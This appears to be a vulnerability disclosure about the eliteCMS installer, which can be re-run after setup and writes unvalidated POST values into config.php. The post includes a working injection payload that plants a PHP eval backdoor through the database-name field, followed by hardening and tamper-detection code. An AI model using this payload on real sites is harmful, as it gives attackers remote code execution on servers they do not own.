eliteCMS: installer not locked after install + one-line shell write vulnerability

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can re-run the installation simply by visiting the installer's URL.

The other vulnerability is that the installer can be made to write a one-line shell directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
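The two findings above (a re-runnable installer, and POST values interpolated verbatim into generated PHP) share one root cause: the installer trusts its input and never checks its own state. The following is an added example, not eliteCMS code, of how the step-4 writer could be hardened. The function names, the lock-file path and the idea that raw values arrive in an array such as $_POST are assumptions for the example; eliteCMS itself parks the values in $_SESSION on an earlier step, and the validation belongs before that too.

```php
<?php
// Added example (not eliteCMS code): a hardened variant of the installer's
// step-4 config writer. Names below (installIsLocked, validateDbSettings,
// renderConfig, writeConfig, configLooksTampered, $lockFile) are assumed.
declare(strict_types=1);

// Fix 1: once installation completes, a lock file is written and the
// installer refuses to run again.
function installIsLocked(string $lockFile): bool
{
    return is_file($lockFile);
}

// Fix 2: allowlist every value that will be embedded in generated PHP.
// Host, database and user names get strict patterns; the password may be
// any printable string but is emitted via var_export(), so it cannot break
// out of the string literal it is placed in.
function validateDbSettings(array $input): array
{
    $patterns = [
        'DB_SERVER' => '/^[A-Za-z0-9.:_-]{1,253}$/',  // host or host:port
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.-]{1,32}$/',
    ];
    $clean = [];
    foreach ($patterns as $key => $re) {
        $value = $input[$key] ?? null;
        if (!is_string($value) || preg_match($re, $value) !== 1) {
            throw new InvalidArgumentException("Rejected value for $key");
        }
        $clean[$key] = $value;
    }
    $pass = $input['DB_PASS'] ?? null;
    if (!is_string($pass) || strlen($pass) > 256 || ($pass !== '' && !ctype_print($pass))) {
        throw new InvalidArgumentException('Rejected value for DB_PASS');
    }
    $clean['DB_PASS'] = $pass;
    return $clean;
}

// Fix 3: build the file with var_export() instead of string interpolation,
// and leave out the closing "?>" tag so a stray "?>" in a value stays inert.
function renderConfig(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= sprintf("define('%s', %s);\n", $key, var_export($settings[$key], true));
    }
    // the connection-setup code would follow here, as in the original
    return $out;
}

function writeConfig(string $file, string $lockFile, array $input): void
{
    if (installIsLocked($lockFile)) {
        http_response_code(403);
        exit('Installation already completed; delete the install directory.');
    }
    $config = renderConfig(validateDbSettings($input));
    // Write to a temp file and rename, so a half-written config is never live.
    $tmp = $file . '.tmp';
    if (file_put_contents($tmp, $config, LOCK_EX) === false || !rename($tmp, $file)) {
        throw new RuntimeException('Could not write ' . $file);
    }
    file_put_contents($lockFile, date('c') . "\n");
}

// Defender-side check for an existing config.php: a legitimately generated
// config has exactly one "<?php" open tag and never calls eval().
function configLooksTampered(string $source): bool
{
    $openTags = 0;
    foreach (token_get_all($source) as $tok) {
        if (!is_array($tok)) {
            continue;
        }
        if ($tok[0] === T_OPEN_TAG) {
            $openTags++;
        } elseif ($tok[0] === T_EVAL) {
            return true;
        }
    }
    return $openTags !== 1;
}

// Demo on constructed input; nothing is written to disk.
try {
    validateDbSettings(['DB_SERVER' => 'localhost', 'DB_NAME' => 'x"?>bad',
                        'DB_USER' => 'elite', 'DB_PASS' => 'p']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";   // the injected DB_NAME is rejected outright
}
$cfg = renderConfig(validateDbSettings(['DB_SERVER' => 'localhost', 'DB_NAME' => 'elite',
                                        'DB_USER' => 'elite', 'DB_PASS' => "pa?>ss'word"]));
echo $cfg;                         // DB_PASS lands as the literal 'pa?>ss\'word'
var_dump(configLooksTampered($cfg));                                        // false
var_dump(configLooksTampered("<?php\ndefine('DB_NAME', 'x');\n?><?php echo 1; ?>\n")); // true
```

The lock file addresses the first finding, and the allowlist plus var_export() addresses the second: even a value containing quotes or "?>" is serialised as a proper PHP string literal rather than spliced into source text. The tokenizer check at the end is the kind of thing to run over admin/includes/config.php on an already-deployed site; for a site that has been exposed, removing the install directory entirely after setup is still the safer fix.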